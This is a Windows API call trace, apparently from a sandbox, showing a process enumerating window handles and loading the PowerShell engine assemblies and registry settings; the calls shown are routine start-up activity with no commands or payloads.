	[0262.438] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4d0
	[0262.438] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4d0
	[0262.438] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4d0
	[0262.438] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x79c
	[0262.438] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4d0
	[0262.438] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4e0
	[0262.438] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4d0
	[0262.438] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x460
	[0262.438] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x460
	[0262.439] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x44c
	[0262.439] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x778
	[0262.439] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x460
	[0262.439] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x558
	[0262.439] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4d0
	[0262.439] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4d0
	[0262.439] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x7e0
	[0262.439] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0xa74
	[0262.439] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x694
	[0262.439] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0xa28
	[0262.439] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x9b0
	[0262.440] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x8d8
	[0262.440] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x940
	[0262.440] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x93c
	[0262.440] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4ec
	[0262.440] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x150
	[0262.440] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x720
	[0262.440] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x3c4
	[0262.440] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x7d4
	[0262.440] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x6c8
	[0262.440] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0xb54
	[0262.441] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0xb54
	[0262.441] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0xb5c
	[0262.441] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x838
	[0262.441] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x818
	[0262.441] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x5b8
	[0262.441] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x494
	[0262.441] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x1ec
	[0262.441] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x440
	[0262.441] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x7e8
	[0262.442] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x730
	[0262.442] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x2c8
	[0262.442] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x31c
	[0262.442] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x330
	[0262.442] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x128
	[0262.442] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x5c8
	[0262.442] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x6f8
	[0262.442] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x358
	[0262.442] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x73c
	[0262.442] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0xb0
	[0262.443] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x250
	[0262.443] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x240
	[0262.443] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x790
	[0262.443] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x61c
	[0262.443] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x568
	[0262.443] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x538
	[0262.443] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x540
	[0262.443] GetWindowThreadProcessId (in: hWnd=0x700a4, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x510
	[0262.443] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x460
	[0262.443] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x79c
	[0262.443] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x4e0
	[0262.444] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x460
	[0262.444] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x28d780 | out: lpdwProcessId=0x28d780) returned 0x778
	[0262.447] WerSetFlags () returned 0x0
	[0262.454] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0262.454] CoTaskMemFree (pv=0x0) 
	[0262.455] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x28dae8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x28dae0 | out: pulNumLanguages=0x28dae8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x28dae0) returned 1
	[0262.455] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x28dae8, pwszLanguagesBuffer=0x2c00a00, pcchLanguagesBuffer=0x28dae0 | out: pulNumLanguages=0x28dae8, pwszLanguagesBuffer=0x2c00a00, pcchLanguagesBuffer=0x28dae0) returned 1
	[0262.461] CoTaskMemAlloc (cb=0x24) returned 0x5110a0
	[0262.461] GetUserDefaultLocaleName (in: lpLocaleName=0x5110a0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0262.461] CoTaskMemFree (pv=0x5110a0) 
	[0263.201] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0263.201] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0263.201] CoTaskMemFree (pv=0x471920) 
	[0263.204] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0263.204] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0263.204] CoTaskMemFree (pv=0x471920) 
	[0263.206] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0263.206] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0263.206] CoTaskMemFree (pv=0x471920) 
	[0263.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0263.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0263.217] SetErrorMode (uMode=0x1) returned 0x1
	[0263.217] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x28d760 | out: lpFileInformation=0x28d760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0263.218] SetErrorMode (uMode=0x1) returned 0x1
	[0263.218] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x28d9d0 | out: lpdwHandle=0x28d9d0) returned 0x94c
	[0263.219] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c04290 | out: lpData=0x2c04290) returned 1
	[0263.220] VerQueryValueW (in: pBlock=0x2c04290, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x28d948, puLen=0x28d940 | out: lplpBuffer=0x28d948*=0x2c0432c, puLen=0x28d940) returned 1
	[0263.220] VerQueryValueW (in: pBlock=0x2c04290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x28d8b8, puLen=0x28d8b0 | out: lplpBuffer=0x28d8b8*=0x2c04408, puLen=0x28d8b0) returned 1
	[0263.220] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0263.220] CoTaskMemAlloc (cb=0x2e) returned 0x515640
	[0263.220] lstrcpyW (in: lpString1=0x515640, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0263.220] CoTaskMemFree (pv=0x515640) 
	[0263.220] VerQueryValueW (in: pBlock=0x2c04290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x28d8b8, puLen=0x28d8b0 | out: lplpBuffer=0x28d8b8*=0x2c0445c, puLen=0x28d8b0) returned 1
	[0263.220] lstrlenW (lpString="System.Management.Automation") returned 28
	[0263.220] CoTaskMemAlloc (cb=0x3c) returned 0x51ed20
	[0263.220] lstrcpyW (in: lpString1=0x51ed20, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0263.220] CoTaskMemFree (pv=0x51ed20) 
	[0263.220] VerQueryValueW (in: pBlock=0x2c04290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x28d8b8, puLen=0x28d8b0 | out: lplpBuffer=0x28d8b8*=0x2c044b8, puLen=0x28d8b0) returned 1
	[0263.220] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0263.220] CoTaskMemAlloc (cb=0x20) returned 0x519fb0
	[0263.220] lstrcpyW (in: lpString1=0x519fb0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0263.220] CoTaskMemFree (pv=0x519fb0) 
	[0263.220] VerQueryValueW (in: pBlock=0x2c04290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x28d8b8, puLen=0x28d8b0 | out: lplpBuffer=0x28d8b8*=0x2c044f8, puLen=0x28d8b0) returned 1
	[0263.220] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0263.220] CoTaskMemAlloc (cb=0x44) returned 0x51ed20
	[0263.220] lstrcpyW (in: lpString1=0x51ed20, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0263.220] CoTaskMemFree (pv=0x51ed20) 
	[0263.220] VerQueryValueW (in: pBlock=0x2c04290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x28d8b8, puLen=0x28d8b0 | out: lplpBuffer=0x28d8b8*=0x2c04560, puLen=0x28d8b0) returned 1
	[0263.220] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0263.220] CoTaskMemAlloc (cb=0x76) returned 0x4aff80
	[0263.220] lstrcpyW (in: lpString1=0x4aff80, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0263.221] CoTaskMemFree (pv=0x4aff80) 
	[0263.221] VerQueryValueW (in: pBlock=0x2c04290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x28d8b8, puLen=0x28d8b0 | out: lplpBuffer=0x28d8b8*=0x2c045fc, puLen=0x28d8b0) returned 1
	[0263.221] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0263.221] CoTaskMemAlloc (cb=0x44) returned 0x51ed20
	[0263.221] lstrcpyW (in: lpString1=0x51ed20, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0263.221] CoTaskMemFree (pv=0x51ed20) 
	[0263.221] VerQueryValueW (in: pBlock=0x2c04290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x28d8b8, puLen=0x28d8b0 | out: lplpBuffer=0x28d8b8*=0x2c04660, puLen=0x28d8b0) returned 1
	[0263.221] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0263.221] CoTaskMemAlloc (cb=0x58) returned 0x4d1300
	[0263.221] lstrcpyW (in: lpString1=0x4d1300, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0263.221] CoTaskMemFree (pv=0x4d1300) 
	[0263.221] VerQueryValueW (in: pBlock=0x2c04290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x28d8b8, puLen=0x28d8b0 | out: lplpBuffer=0x28d8b8*=0x2c046dc, puLen=0x28d8b0) returned 1
	[0263.221] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0263.221] CoTaskMemAlloc (cb=0x20) returned 0x519fb0
	[0263.221] lstrcpyW (in: lpString1=0x519fb0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0263.221] CoTaskMemFree (pv=0x519fb0) 
	[0263.221] VerQueryValueW (in: pBlock=0x2c04290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x28d8b8, puLen=0x28d8b0 | out: lplpBuffer=0x28d8b8*=0x2c04384, puLen=0x28d8b0) returned 1
	[0263.221] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0263.221] CoTaskMemAlloc (cb=0x66) returned 0x50ce50
	[0263.221] lstrcpyW (in: lpString1=0x50ce50, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0263.221] CoTaskMemFree (pv=0x50ce50) 
	[0263.221] VerQueryValueW (in: pBlock=0x2c04290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x28d8b8, puLen=0x28d8b0 | out: lplpBuffer=0x28d8b8*=0x0, puLen=0x28d8b0) returned 0
	[0263.221] VerQueryValueW (in: pBlock=0x2c04290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x28d8b8, puLen=0x28d8b0 | out: lplpBuffer=0x28d8b8*=0x0, puLen=0x28d8b0) returned 0
	[0263.221] VerQueryValueW (in: pBlock=0x2c04290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x28d8b8, puLen=0x28d8b0 | out: lplpBuffer=0x28d8b8*=0x0, puLen=0x28d8b0) returned 0
	[0263.221] VerQueryValueW (in: pBlock=0x2c04290, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x28d888, puLen=0x28d880 | out: lplpBuffer=0x28d888*=0x2c0432c, puLen=0x28d880) returned 1
	[0263.222] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0263.222] VerLanguageNameW (in: wLang=0x0, szLang=0x4b2780, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0263.222] CoTaskMemFree (pv=0x4b2780) 
	[0263.222] VerQueryValueW (in: pBlock=0x2c04290, lpSubBlock="\\", lplpBuffer=0x28d8d8, puLen=0x28d8d0 | out: lplpBuffer=0x28d8d8*=0x2c042b8, puLen=0x28d8d0) returned 1
	[0263.230] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0263.230] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0263.230] CoTaskMemFree (pv=0x471920) 
	[0263.232] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0263.232] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0263.232] CoTaskMemFree (pv=0x471920) 
	[0263.235] lstrlenW (lpString="䅁") returned 1
	[0263.872] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d7a8 | out: phkResult=0x28d7a8*=0x300) returned 0x0
	[0263.874] RegOpenKeyExW (in: hKey=0x300, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d798 | out: phkResult=0x28d798*=0x304) returned 0x0
	[0263.874] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d828 | out: phkResult=0x28d828*=0x308) returned 0x0
	[0263.878] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d76c, lpData=0x0, lpcbData=0x28d768*=0x0 | out: lpType=0x28d76c*=0x1, lpData=0x0, lpcbData=0x28d768*=0x56) returned 0x0
	[0263.879] CoTaskMemAlloc (cb=0x5a) returned 0x50cde0
	[0263.879] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d73c, lpData=0x50cde0, lpcbData=0x28d738*=0x56 | out: lpType=0x28d73c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d738*=0x56) returned 0x0
	[0263.879] CoTaskMemFree (pv=0x50cde0) 
	[0263.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0263.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0263.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0264.833] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0264.833] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0264.833] CoTaskMemFree (pv=0x471920) 
	[0267.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x28d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0267.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x28d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0268.286] CoTaskMemAlloc (cb=0x104) returned 0x471a30
	[0268.286] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0268.286] CoTaskMemFree (pv=0x471a30) 
	[0268.288] CoTaskMemAlloc (cb=0x104) returned 0x471a30
	[0268.288] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0268.288] CoTaskMemFree (pv=0x471a30) 
	[0268.791] CoTaskMemAlloc (cb=0x104) returned 0x471a30
	[0268.791] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0268.791] CoTaskMemFree (pv=0x471a30) 
	[0268.792] CoTaskMemAlloc (cb=0x104) returned 0x471a30
	[0268.792] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0268.792] CoTaskMemFree (pv=0x471a30) 
	[0268.792] CoTaskMemAlloc (cb=0x104) returned 0x471a30
	[0268.792] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0268.792] CoTaskMemFree (pv=0x471a30) 
	[0270.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x28d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0270.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x28d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0270.468] CoTaskMemAlloc (cb=0x104) returned 0x471a30
	[0270.468] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0270.468] CoTaskMemFree (pv=0x471a30) 
	[0270.471] CoTaskMemAlloc (cb=0x104) returned 0x471a30
	[0270.471] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0270.472] CoTaskMemFree (pv=0x471a30) 
	[0271.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0271.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
